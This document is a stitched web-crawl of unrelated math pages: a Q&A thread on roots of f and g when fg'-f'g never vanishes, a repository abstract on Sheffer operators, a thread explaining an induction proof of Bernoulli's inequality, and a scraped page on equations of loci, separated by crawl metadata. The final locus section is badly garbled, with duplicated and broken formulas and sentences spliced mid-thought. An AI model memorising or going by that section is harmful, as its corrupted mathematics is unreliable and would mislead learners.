• If you see a good comment, try to tactfully suggest an edit to the answer. Answers are often abandoned by their users despite having important comments pending.
• If you, as a moderator, commenter, or viewer, see a valuable and succinct comment in a chat room that was unadressed after several days, add it as a tactful edit to the answer or re-add it as a comment. Do not do this for the back-and-forth comments that caused the move to chat in the first place.
|
2023-03-27 03:18:27
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.32270348072052, "perplexity": 946.1504681319915}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296946637.95/warc/CC-MAIN-20230327025922-20230327055922-00651.warc.gz"}
|
https://math.stackexchange.com/questions/2567104/roots-of-a-function-between-two-roots-of-another-function
|
# Roots of a function between two roots of another function
I've been asked the following problem:
Let $f$ and $g$ be two functions differatiable in the interval $I$. Proove that if $$f(x)g'(x) - f'(x)g(x) \ne 0 \quad \forall x \in I$$ there is one root of $g$ between every two roots of $f$
Now, the problem is, this question was asked in German, and the word for 'one' and the word for 'a' are both the same in German. In other words, I do not know, if the sentence says exactly one root of $g$ or at least one root of $g$. I've already spent a few hours on this problem and managed to show that there is at least one root of $g$ between two roots of $f$:
$$f(x)g'(x) - f'(x)g(x) = c, \quad c \ne 0$$ $$\Leftrightarrow g(x) = \frac{f(x)g'(x) - c}{f'(x)}$$ $$x_1, x2 \in I, \quad f(x_1) = 0, \quad f(x_2) = 0$$ $$g(x_1) = \frac{f(x_1)g'(x_1) - c}{f'(x_1)} = -\frac{c}{f'(x_1)}$$ $$g(x_2) = \frac{f(x_2)g'(x_2) - c}{f'(x_2)} = -\frac{c}{f'(x_2)}$$ Next, we can say If $g(x_1)$ and $g(x_2)$ have different signs, there exists a $\xi$ for which $g(\xi) = 0$ (IVT)
$g(x_1)$ and $g(x_2)$ have different signs if and only if $f'(x_1)$ and $f'(x_2)$ have different signs. Using Rolle's Theorem we can say:
There is an $\eta \in (x_1, x_2) : f'(\eta) = 0$
As $x_1 < \eta < x_2$ we can say, that either $f'(x_1)$ is negative and $f'(x_2)$ is positive or vice versa. Therefore the signs of $g(x_1)$ and $g(x_2)$ are different as well, and we know that there must be at least one root in the interval.
However, I just do not manage to create a proof that shows that there can't be more than 1 root in the interval. My guess would have been using Rolle's Theorem for a proof by contradiction, however there might perfectly be an extremum in the intervals, since $g(x)$ might have other roots outside the bounds of the interval. (Or did I get something wrong here)
So my question is:
Is the initial statement true, and if it is, how can I proove it?
• I believe the German statement asked for "a root". I'm a Spanish native speaker and the same ambiguity would have happened in Spanish; in this language the convention in maths is that if there's no precision "un/una" means "a/an", that is "at least one". – Alejandro Nasif Salum Dec 14 '17 at 22:54
• Also, the uniqueness comes from the fact that the statement is symmetric in $f$ and $g$, so under those conditions you proved that there is "at least one" root of $g$ between two given roots of $f$, but you've also proved that there is "at least one" root of $f$ between two given roots of $g$. If you add the precision "consecutive" roots, then this implies uniqueness. On the other hand, between non-consecutive roots of, say, $f$ there can be more than one root of $g$; precisely one more than the number of roots $f$ you have left in between. – Alejandro Nasif Salum Dec 14 '17 at 22:58
• This does not address your main concern, but the proof itself might be simplified by observing that under the assumption that $g$ has no roots, $f'(x)g(x)-f(x)g'(x)$ is just $g^2(x)$ times the derivative of $\frac{f(x)}{g(x)}$, and Rolle says that this must be zero somewhere in-between. – Hagen von Eitzen Dec 14 '17 at 23:01
• Just to be sure: Does this mean i can say: Assume $g(x)$ has no roots. Let $h(x) = \frac{f(x)}{g(x)}$. Then $h(x_1) = h(x_2) = 0$ because $f(x_1) = f(x_2) = 0$. Because of Rolle this means that $h'(\xi) = 0$, therefore $f'(\xi)g(\xi) - f(\xi)g'(\xi)$ must be $0$ as well, which contradicts the statement. Because of that, $g(x)$ must have roots. – zockDoc Dec 14 '17 at 23:21
The uniqueness comes from the fact that the statement is symmetric in $f$ and $g$, so under those conditions you proved that there is "at least one" root of $g$ between two given roots of $f$, but you've also proved that there is "at least one" root of $f$ between two given roots of $g$. If you add the precision "consecutive" roots, then this implies uniqueness.
On the other hand, between non-consecutive roots of, say, $f$ there can be more than one root of $g$; precisely one more than the number of roots $f$ you have left in between.
Anyway, I would say your proof works fine only under the hypothesis of consecutive roots. If you allow $f$ to be $0$ in the interval $(x_1,x_2)$, then I do not see how you could conclude that $f'(x_1)$ and $f'(x_2)$ have different signs. Think for instance of $f(x)=x^3-x$ in the interval $[-1,1]$, where Rolle's conditions are met, but $f'(-1)=f'(1)=2$.
|
2020-07-09 11:12:17
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8586605787277222, "perplexity": 86.96344674100625}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655899931.31/warc/CC-MAIN-20200709100539-20200709130539-00440.warc.gz"}
|
https://cronfa.swan.ac.uk/Record/cronfa50766
|
Journal article 296 views 69 downloads
Sheffer homeomorphisms of spaces of entire functions in infinite dimensional analysis / Dmitri Finkelshtein, Yuri Kondratiev, Eugene Lytvynov, Maria João Oliveira, Ludwig Streit
Journal of Mathematical Analysis and Applications, Volume: 479, Issue: 1, Pages: 162 - 184
Swansea University Authors:
• PDF | Accepted Manuscript
Released under the terms of a Creative Commons Attribution Non-Commercial No Derivatives License (CC-BY-NC-ND).
DOI (Published version): 10.1016/j.jmaa.2019.06.021
Abstract
For certain Sheffer sequences $(s_n)_{n=0}^\infty$ on $\mathbb C$, Grabiner (1988) proved that, for each $\alpha\in[0,1]$, the corresponding Sheffer operator $z^n\mapsto s_n(z)$ extends to a linear self-homeomorphism of $\mathcal E^{\alpha}_{\mathrm{min}}(\mathbb C)$, the Fr\'echet topological...
Full description
Published in: Journal of Mathematical Analysis and Applications 0022-247X Elsevier BV 2019 https://cronfa.swan.ac.uk/Record/cronfa50766 No Tags, Be the first to tag this record!
Abstract: For certain Sheffer sequences $(s_n)_{n=0}^\infty$ on $\mathbb C$, Grabiner (1988) proved that, for each $\alpha\in[0,1]$, the corresponding Sheffer operator $z^n\mapsto s_n(z)$ extends to a linear self-homeomorphism of $\mathcal E^{\alpha}_{\mathrm{min}}(\mathbb C)$, the Fr\'echet topological space of entire functions of order at most $\alpha$ and minimal type (when the order is equal to $\alpha>0$). In particular, every function $f\in \mathcal E^{\alpha}_{\mathrm{min}}(\mathbb C)$ admits a unique decomposition $f(z)=\sum_{n=0}^\infty c_n s_n(z)$, and the series converges in the topology of $\mathcal E^{\alpha}_{\mathrm{min}}(\mathbb C)$. Within the context of a complex nuclear space $\Phi$ and its dual space $\Phi'$, in this work we generalize Grabiner's result to the case of Sheffer operators corresponding to Sheffer sequences on $\Phi'$. In particular, for $\Phi=\Phi'=\mathbb C^n$ with $n\ge2$, we obtain the multivariate extension of Grabiner's theorem. Furthermore, for an Appell sequence on a general co-nuclear space $\Phi'$, we find a sufficient condition for the corresponding Sheffer operator to extend to a linear self-homeomorphism of $\mathcal E^{\alpha}_{\mathrm{min}}(\Phi')$ when $\alpha>1$. The latter result is new even in the one-dimensional case. Infinite dimensional holomorphy; Nuclear and co-nuclear spaces; Sequence of polynomials of binomial type; Sheffer operator; Sheffer sequence; Spaces of entire functions 1 162 184
|
2021-12-01 05:53:41
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8219335079193115, "perplexity": 792.103191927956}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964359093.97/warc/CC-MAIN-20211201052655-20211201082655-00106.warc.gz"}
|
http://math.stackexchange.com/questions/58700/beginner-mathematical-induction-help-understanding-example/58702
|
Beginner - Mathematical induction - help understanding example?
So:
$$(1+x)^n ≥ 1 + nx$$
So he checks for 1, and get:
$$1+x ≥ 1+x$$
Next for variable k:
$$(1+x)^k ≥ 1 + kx$$
Then the book wanna prove:
$$(1+x)^{k+1} ≥ 1 + (k + 1)x$$
And here is books proof:
$$(1+x)^{k+1} = (1+x)^k (1+x) ≥ (1+kx)(1+x)$$ $$= 1+(k+1)x + kx^2 ≥ 1 + (k + 1)x$$
Finished! Well... How did the book get this: $(1+kx)(1+x)$ in that last part? Sorry, I'm so confused. Sorry if this to easy to be here. Thanks for all help helping me understand it!
-
Your question is a great one, it is most welcome here! The answer is that, in a proof by induction, we first check the base case (here, it is $n=1$), and then, assuming the result is true for $n=k$, we prove that the result must also be true for $n=k+1$. In other words, we want to prove that $$\text{true for }n=k\implies\text{true for }n=k+1$$
Intuitively, this lets us say \begin{align} (\text{base case}) \qquad\qquad\qquad\qquad\qquad\qquad&\text{true for }n=1\qquad\checkmark\\ {\text{true for }n=1,\text{ and }\atop (\text{true for }n=k\implies\text{ true for }n=k+1)}\bigg\}\implies&\text{true for }n=2\qquad\checkmark\\ {\text{true for }n=2,\text{ and }\atop (\text{true for }n=k\implies\text{ true for }n=k+1)}\bigg\}\implies&\text{true for }n=3\qquad\checkmark\\ \vdots\end{align}
Thus, when we try to prove that the statement is true for $n=k+1$, i.e. $$(1+x)^{k+1} ≥ 1 + (k + 1)x,$$ we can use the assumption that the statement is true for $n=k$, i.e. $$(1+x)^k ≥ 1 + kx.$$ The reason why we have $$(1+x)^k (1+x) ≥ (1+kx)(1+x)$$ is that we are assuming $$(1+x)^k ≥ 1 + kx$$ is true, and then we multiply both sides by $(1+x)$.
Actually, $n=0$ can be a base case as well :-) – Asaf Karagila Aug 21 '11 at 14:44
In your next to last line, you have $(1+x)^k,$ which you have assumed two lines above is greater than or equal to $1+kx$. So it made the substitution, using a $\ge$ sign. You might look at this answer, which has a detailed explanation of induction.
|
2015-10-04 17:13:54
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9133538007736206, "perplexity": 309.1937281672293}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443736675795.7/warc/CC-MAIN-20151001215755-00087-ip-10-137-6-227.ec2.internal.warc.gz"}
|
http://www.etap.umb.sk/o7fqxqj/equation-of-locus-4b2764
|
(For now, don’t worry about why x + y = 4 should look like a line, and not something different, e.g. 0 &= x^2-4ay+4a^2 \\ If so, make sure to like, comment, Share and Subscribe! a)Find the equation of the locus of point P b)Find the coordinates of the points where the locus of P cuts the x-axis Helppppp please! Equation of locus. Find the locus of all points P PP in a plane such that the sum of the distances PAPAPA and PBPBPB is a fixed constant, where AAA and BBB are two fixed points in the plane. A rod of length lll slides with its ends on the xxx-axis and yyy-axis. Find an equation for the set of all points (x,y) satisfying the given condition: The product of its distances from the coordinate axes is 4. answer: xy= plus or minus 4 Please show how you have come up with your answer. x^2+y^2 &= \frac{c^2}{2}-a^2. Let PA=d1PA = d_1PA=d1 and PB=d2. Here is a step-by-step procedure for finding plane loci: Step 1: If possible, choose a coordinate system that will make computations and equations as simple as possible. There is also another possibility of y = -5, also a line parallel to the X-axis, at a distance of 5 units, but lying below the axis. 4d_1^2d_2^2 &= \big(c^2-d_1^2-d_2^2\big)^2 \\ Find the equation of the locus of the midpoint P of Segment AB. In most cases, the relationship of these points is defined according to their position in rectangular coordinates. Thanx! Hence the equation of locus y 2 = 2x. The equation of the locus of a moving point P ( x, y) which is always at a constant distance from two fixed points ( … \end{aligned}d1+d2d12+d22+2d1d24d12d224d12d2200(4c2−16a2)x2+(4c2)y2=c=c2=(c2−d12−d22)2=c4−2c2(d12+d22)+(d12+d22)2=c4−2c2(d12+d22)+(d12−d22)2=c4−2c2(2x2+2y2+2a2)+16a2x2=c2(c2−4a2)., Since 4c2−16a2>0 4c^2-16a^2>04c2−16a2>0 and c2−4a2>0, c^2-4a^2>0,c2−4a2>0, this is the equation of an ellipse. y &= \frac{x^2}{4a} + a, Log in. It is given that OP = 4 (where O is the origin). If c<2a, c < 2a,c<2a, then the locus is clearly empty, and if c=2a, c=2a,c=2a, then the locus is a point, so assume c>2a. PB=d_2.PB=d2. For more Information & Topic wise videos visit: www.impetusgurukul.com I hope you enjoyed this video. x 2 = 0, x^2=0, x2 = 0, or. The answer is reported as 8x^2 - y^2 -2x +2y -2 = 0, which i failed to get. 0 &= c^4-2c^2\big(d_1^2+d_2^2\big) + \big(d_1^2-d_2^2\big)^2 \\ 0 &= c^4-2c^2\big(2x^2+2y^2+2a^2\big)+16a^2x^2 \\ Solution: Let P(x. y) be the point on the locus and … Well, that’s it! Going in the reverse order, the equation y = 5 is the equation of the locus / curve, every point on which has the y-coordinate as 5, or every point being at a distance of 5 units from the X-axis (the condition which was initially given). Firstly, writing the characteristic equation of the above system, So, from the above equation, we get, s = 0, -5 and -10. Then, PA2+PB2=c2(x+a)2+y2+(x−a)2+y2=c22x2+2y2+2a2=c2x2+y2=c22−a2.\begin{aligned} Question 2 : The coordinates of a moving point P are (a/2 (cosec θ + sin θ), b/2 (cosecθ − sin θ)), where θ is a variable parameter. □_\square□. Point P$(x, y)$ moves in such a way that its distance from the point $(3, 5)$ is proportional to its distance from the point $(-2, 4)$. After translating and rotating, we may assume A=(−a,0) A = (-a,0)A=(−a,0) and B=(a,0),B = (a,0),B=(a,0), and let the constant be c. c.c. Find the locus of P if the origin is a point on the locus. If the origin is shifted to the point O'(2, 3), the axes remaining parallel to the original axes, find the new co-ordinates of the points A(1, 3) x = 0, x=0, x = 0, which gives a line perpendicular to the original line through the point; this makes sense geometrically as well. 1. To find the equation to a locus, we start by converting the given conditions to mathematical equations. (x+a)^2+y^2+(x-a)^2+y^2 &= c^2 \\ Given L(-4,0), M(0,8) and a point P moves in such a way that PT = 2PO where T is teh midpoint of LM and O is the origin. This curve is called the locus of the equation. AAA and BBB are two points in R2\mathbb{R}^2R2. The locus of points in the. If I write an equation, say x + y = 4 and tell you that this represents a line which looks like this…. d_1^2+d_2^2+2d_1d_2 &= c^2 \\ We’ll see that later.). That’s it for this part. If A(2, 0) and B(0, 3) are two points, find the equation of the locus of point P such that AP = 2BP. I have tried and tried to answer but it seems that I didn't get the answer. Example – 37: Find the equation of locus of a point such that the sum of its distances from co-ordinate axes is thrice its distance from the origin. Step 2: Write the given conditions in a mathematical form involving the coordinates xxx and yyy. Here the locus is defining as the centre of any location. At times the curve may be defined by a set of conditions rather than by an equation, though an … Pingback: Intersection of a Line and a Circle. The calculation is done using Gröbner bases, so sometimes extra branches of the curve will appear that were not in the original locus. After rotation and translation (and possibly reflection), we may assume that the point is (0,2a) (0,2a)(0,2a) with a≠0 a\ne 0a=0 and that the line is the x xx-axis. This lesson will be focused on equation to a locus. Find the equation of the locus of P, if A = (2, 3), B = (2, –3) and PA + PB = 8. class-11; Share It On Facebook Twitter Email. Problems involving describing a certain locus can often be solved by explicitly finding equations for the coordinates of the points in the locus. Clearly, equation (1) is a first-degree equation in x and y; hence, the locus of P is a straight line whose equation is x + 3y = 4. New user? 4d_1^2d_2^2 &= c^4 - 2c^2\big(d_1^2+d_2^2\big) + \big(d_1^2+d_2^2\big)^2 \\ https://brilliant.org/wiki/equation-of-locus/. We have to construct the root locus for this system and predict the stability of the same. 2. Then d12+d22=(x+a)2+y2+(x−a)2+y2=2x2+2y2+2a2, d_1^2+d_2^2 = (x+a)^2+y^2+(x-a)^2+y^2 = 2x^2+2y^2+2a^2,d12+d22=(x+a)2+y2+(x−a)2+y2=2x2+2y2+2a2, and d12−d22=4ax. So the locus is either empty (\big((if c2<2a2),c^2 < 2a^2\big),c2<2a2), a point (\big((if c2=2a2), c^2=2a^2\big),c2=2a2), or a circle (\big((if c2>2a2).c^2>2a^2\big).c2>2a2). Let P(x, y) be the moving point. Here, we had to find the locus of a point which is at a fixed distance 4 from the origin. We have the equation representing the locus in the first example. □_\square□. or, x + 3y = 4 ……… (1) Which is the required equation to the locus of the moving point. Let the two fixed points be A(1, 1) and B(2, 4), and P(x, y) be the moving point. And if you take any other point not on the line, and add its coordinates together, you’ll never get the sum as 4. In Maths, a locus is the set of points represented by a particular rule or law or equation. In mathematics, locus is the set of points that satisfies the same geometrical properties. \end{aligned}y20y=x2+(y−2a)2=x2−4ay+4a2=4ax2+a,, Note that if the point did lie on the line, e.g. (Hi), I'm having trouble dealing with the following question. y^2 &= x^2+(y-2a)^2 \\ A formal(ish) definition: “The equation of a curve is the relation which exists between the coordinates of all points on the curve, and which does not hold for any point not on the curve”. OP is the distance between O and P which can be written as. What is the locus of points such that the ratio of the distances from AAA and BBB is always λ:1\lambda:1λ:1, where λ\lambdaλ is a positive real number not equal to 1?1?1? answered Nov 18, 2019 by Abhilasha01 (37.5k points) selected Nov 19, 2019 by Jay01 . Many geometric shapes are most naturally and easily described as loci. Suppose the constant is c2, c^2,c2, c≠0. _\square . a circle. I’ll again split it into two parts due to its length. Click hereto get an answer to your question ️ Find the equation of locus of a point, the difference of whose distances from ( - 5,0) and (5,0) is 8 Step 4: Identify the shape cut out by the equations. Issuu is a digital publishing platform that makes it simple to publish magazines, catalogs, newspapers, books, and more online. So, we can write this relation in the form of an equation as. Log in here. 1 Answer +1 vote . Example 1 Determine the equation of the curve such that the sum of the distances of any point of the curve If the locus is the whole plane then the implicit curve is the equation 0=0. After squaring both sides and simplifying, we get the equation as. Show that the equation of the locus P is b 2 x 2 − a 2 y 2 = a 2 b 2. The locus equation is, d1+d2=cd12+d22+2d1d2=c24d12d22=(c2−d12−d22)24d12d22=c4−2c2(d12+d22)+(d12+d22)20=c4−2c2(d12+d22)+(d12−d22)20=c4−2c2(2x2+2y2+2a2)+16a2x2(4c2−16a2)x2+(4c2)y2=c2(c2−4a2).\begin{aligned} Questions involving the locus will become a little more complicated as we proceed. Find the locus of points PPP such that the sum of the squares of the distances from P PP to A AA and from P P P to B, B,B, where AAA and BBB are two fixed points in the plane, is a fixed positive constant. Find the equation of the locus of point P, which is equidistant from A and B. Step 1 is often the most important part of the process since an appropriate choice of coordinates can simplify the work in steps 2-4 immensely. Already have an account? Forgot password? Find the equation of the locus of a point P, the square of the whose distance from the origin is 4 times its y coordinate. Locus of a Moving Point - Explanation & Construction, the rules of the Locus Theorem, how the rules of the Locus Theorem can be used in real world examples, how to determine the locus of points that will satisfy more than one condition, GCSE Maths Exam Questions - Loci, Locus and Intersecting Loci, in video lessons with examples and step-by-step solutions. For example, a circle is the set of points in a plane which are a fixed distance r rr from a given point P, P,P, the center of the circle. \end{aligned}PA2+PB2(x+a)2+y2+(x−a)2+y22x2+2y2+2a2x2+y2=c2=c2=c2=2c2−a2.. In this one, we were to find out the locus of a point such that it is equidistant from two fixed points, which was the perpendicular bisector of the line joining the points. \big(4c^2-16a^2\big)x^2+\big(4c^2\big)y^2 &= c^2\big(c^2-4a^2\big). The next part will cover the remaining examples. d_1^2-d_2^2 = 4ax.d12−d22=4ax. A locus is a set of all the points whose position is defined by certain conditions. After rotating and translating the plane, we may assume that A=(−a,0) A = (-a,0)A=(−a,0) and B=(a,0).B = (a,0).B=(a,0). p² + q² + 4p - 6q = 12. The locus of an equation is a curve containing those points, and only those points, whose coordinates satisfy the equation. botasnegras shared this question 10 years ago . Hence required equation of the locus is 9x² + 9 y² + 14x – 150y – 186 = 0. The locus of points in the xyxyxy-plane that are equidistant from the line 12x−5y=12412x - 5y = 12412x−5y=124 and the point (7,−8)(7,-8)(7,−8) is __________.\text{\_\_\_\_\_\_\_\_\_\_}.__________. According to the condition, PA = PB. d_1+d_2 &= c \\ c>2a.c>2a. Sign up to read all wikis and quizzes in math, science, and engineering topics. The constant is the square of the radius, and the equation of the locus (the circle) is. This can be written as. Hence required equation of the locus is 24x² + 24y² – 150x + 100y + 325 = 0 Example – 16: Find the equation of locus of a point which is equidistant from the points (2, 3) and (-4, 5) PA^2 + PB^2 &= c^2 \\ Thus, P = 3, Z = 0 and since P > Z therefore, the number of … Solution for Find the equation of locus of a point which is at distance 5 from A(4,-3) Let’s find out equations to all the loci we covered previously. A collection of … For example, a range of the Southwest that has been the locus of a number of Independence movements. 2x^2+2y^2+2a^2 &= c^2 \\ Let us try to understand what this means. . The distance from (x,y)(x,y)(x,y) to the xxx-axis is ∣y∣, |y|,∣y∣, and the distance to the point is x2+(y−2a)2, \sqrt{x^2 + (y-2a)^2},x2+(y−2a)2, so the equation becomes, y2=x2+(y−2a)20=x2−4ay+4a2y=x24a+a,\begin{aligned} Find the equation of the locus of a point which moves so that it's distance from (4,-3) is always one-half its distance from (-1,-1). a=0,a=0,a=0, the equation reduces to x2=0, x^2=0,x2=0, or x=0,x=0,x=0, which gives a line perpendicular to the original line through the point; this makes sense geometrically as well. Answered. Definition of a Locus Locus is a Latin word which means "place". Now, the distance of a point from the X axis is its y-coordinate. Step 3: Simplify the resulting equations. … it means that if you take any random point lying on this line, take its x-coordinate and add it to the y-coordinate, you’ll always get 4 as the sum (because the equation says x + y = 4). Further informations and examples on geogebra.org. The equation of the locus of a moving point P ( x, y) which is always at a constant distance (r) from a fixed point ( x1, y1) is: 2. We have the equation representing the locus in the first example. Best answer. I need your help. This locus (or path) was a circle. A locus is a set of points which satisfy certain geometric conditions. Now to the equation. It is given that the point is at a fixed distance, 5 from the X axis. $$\sqrt{(x-1)^2+(y-1)^2}=\sqrt{(x-2)^2+(y-4)^2}$$. After having gone through the stuff given above, we hope that the students would have understood, "How to Find Equation of Locus of Complex Numbers".Apart from the stuff given in this section "How to Find Equation of Locus of Complex Numbers", if you need any other stuff in math, please use our google custom search here. (Hi) there, I was unable to solve the following questions, please help me. Solution : Let the given origin be A ( 2,0) Let the point on the locus be P ( x,y) The distance of P from X- … 6.6 Equation of a Locus. The equation of the locus is 4x^2 + 3y^2 = 12. For example, the locus of points such that the sum of the squares of the coordinates is a constant, is a circle whose center is the origin. The first one was to find out the locus of the point moving on a plane (your screen) which is at a fixed distance from a given line (the bottom edge). To find its equation, the first step is to convert the given condition into mathematical form, using the formulas we have. 1) A is a point on the X-axis and B is a point on the Y-axis such that: 4(OA) + 7(OB) = 20, where O is the origin. Going in the reverse order, the equation y = 5 is the equation of the locus / curve, every point on which has the y -coordinate as 5 , or every point being at a distance of 5 units from the X -axis (the condition which was initially given). View Solution: Latest Problem Solving in Analytic Geometry Problems (Circles, Parabola, Ellipse, Hyperbola) More Questions in: Analytic Geometry Problems (Circles, Parabola, Ellipse, Hyperbola) Of Segment AB to like, comment, Share and Subscribe step is to the! Which can be written as out equations to all the loci we covered previously straight line a a! X2 = 0, x^2=0, x2 = 0, or of the. The stability of the locus P is b 2 x 2 − a 2 y 2 =,. Line be the x axis, and engineering topics and quizzes in math, science and... Certain conditions and tried to answer but it seems that i did get... Whose coordinates satisfy the equation of the Southwest that has been the locus is 9x² + 9 +. We had to find the equation of the points in the locus in the original locus or law equation. Here, we can write this relation in the first example for more Information & Topic wise videos visit www.impetusgurukul.com. 2: write the given condition into mathematical form, using the formulas we have equation... Xxx-Axis and yyy-axis 4 ……… ( 1 ) which is equidistant from a line and fixed! Distance, 5 from the x axis: Intersection of a line which looks like this… following questions, help! I failed to get, x + 3y = 4 ( where is. Only those points, and only those points, and more online the... Created with the locus '' button aligned } PA2+PB2 ( x+a ) 2+y2+ ( x−a 2+y22x2+2y2+2a2x2+y2=c2=c2=c2=2c2−a2.. Simplifying, we had to find its equation, the relationship of these points is according! Cases, the first example at a fixed distance 4 from the x axis is its y-coordinate previously... Into mathematical form, using the formulas we have will be focused on equation to a locus is a of! 6Q = 12 150y – 186 = 0, or relationship of these points is by. ( P, q ) is is called the locus in the locus P is 2... Of all the loci we covered previously coordinates xxx and yyy start by converting the condition... Of point P, which is equidistant from a and b containing points. To read all wikis and quizzes in math, science, and more online axis, and equation! 150Y – 186 = 0, x^2=0, x2 = 0, which is the origin is set...: Intersection of a circle: Intersection of a line and a fixed distance 4 from the axis. Be the moving point, c≠0 mathematical form involving the locus of the locus a. Curve is called the locus under the given conditions in a mathematical form involving coordinates! 186 = 0, which i failed to get Intersection of a point from the x axis which . Equation representing the locus is the square of the radius, and P which be... Simple to publish magazines, catalogs, newspapers, books, and P which can be written.... Point P, q ) is origin is a Latin word which means place.! Be an easy way to find the equation of the points in the first example if so make. Publishing platform that makes it simple to publish magazines, catalogs, newspapers, books and! Locus, we had to find the locus of a number of Independence movements that! Points, whose coordinates satisfy the equation to the locus of the locus is set! Has been the locus of P if the origin ) length lll with. Show that the equation to a locus is the set of points that satisfies the same geometrical.! Covered previously branches of the locus in the first example solve the following questions, help... Y ) be the moving point 9x² + 9 y² + 14x – 150y – =. This system and predict the stability of the locus ( or path ) was a.. Covered previously for this system and predict the stability of the points in the original locus be. In mathematics, locus is the distance between O and P which can be written as on equation to locus. The midpoint P of Segment AB: write the given conditions to mathematical equations to publish magazines catalogs... Appear that were not in the original locus the relationship of these points defined... Like, comment, Share and Subscribe and a circle 9x² + 9 y² + 14x – 150y – =... Mathematics, locus is a digital publishing platform that makes it simple to publish magazines, catalogs, newspapers books. The point is at a fixed distance, 5 from the origin ) in Maths a., say x + y = 4 ……… ( 1 ) which is at a fixed distance from! I failed to get 14x – 150y – 186 = 0, or P can! Out equations to all the loci we covered previously the given conditions mathematical! And predict the stability of the locus of point P, q ) is c^2! Most naturally and easily described as loci ( 37.5k points ) selected Nov 19, 2019 Abhilasha01..., so sometimes extra branches of the midpoint P of Segment AB Information & wise! Line and a circle an ellipse a hyperbola guess there must be an easy way to find its,. Using Gröbner bases, so sometimes extra branches of the equation of the locus x ( P which! Containing those points, and P which can be written as questions involving locus... Bases, so sometimes extra branches of the Southwest that has been locus... Tried to answer but it seems that i did n't get the equation representing the locus is as. By converting the given conditions is x2 + y2 = 16 the formulas we have the of! And quizzes in math, science, and only those points, and more online on to! I guess there must be an easy way to find the locus of the moving point equation! Will appear that were not in the original locus focused on equation to a locus is a point from x. Origin is a digital publishing platform that makes it simple to publish magazines catalogs! There must be an easy way to find the locus in R2\mathbb { }... Be written as a hyperbola math, science, and only those points, whose coordinates satisfy equation... { aligned } PA2+PB2 ( x+a ) 2+y2+ ( x−a ) 2+y22x2+2y2+2a2x2+y2=c2=c2=c2=2c2−a2. it... Of any location y 2 = 0, x^2=0, x2 = 0 not in first. Moving point in the first step is to convert the given conditions to mathematical.... Sometimes extra branches of the same of length lll slides with its ends the... Which looks like this… ( or path ) was a circle that was with. Issuu is a Latin word which means place '', locus is defining as the centre any... Equations for the coordinates xxx and yyy to their position in rectangular coordinates geometrical properties will become a little complicated. All wikis and quizzes in math, science, and engineering equation of locus -2x +2y -2 = 0 same... Using Gröbner bases, so sometimes extra branches of the locus publish magazines, catalogs, newspapers books. ( the circle ) is the relationship of these points is defined by certain..: www.impetusgurukul.com i hope you enjoyed this video these points is defined according to their position rectangular. Curve is called the locus of point P, q ) is is its y-coordinate as 8x^2 - -2x... Platform that makes it simple to publish magazines, catalogs, newspapers books! Sign up to read all wikis and quizzes in math, science, only..., c^2, c2, c^2, c2, c^2, c2, c^2, c2, c≠0 of locus. 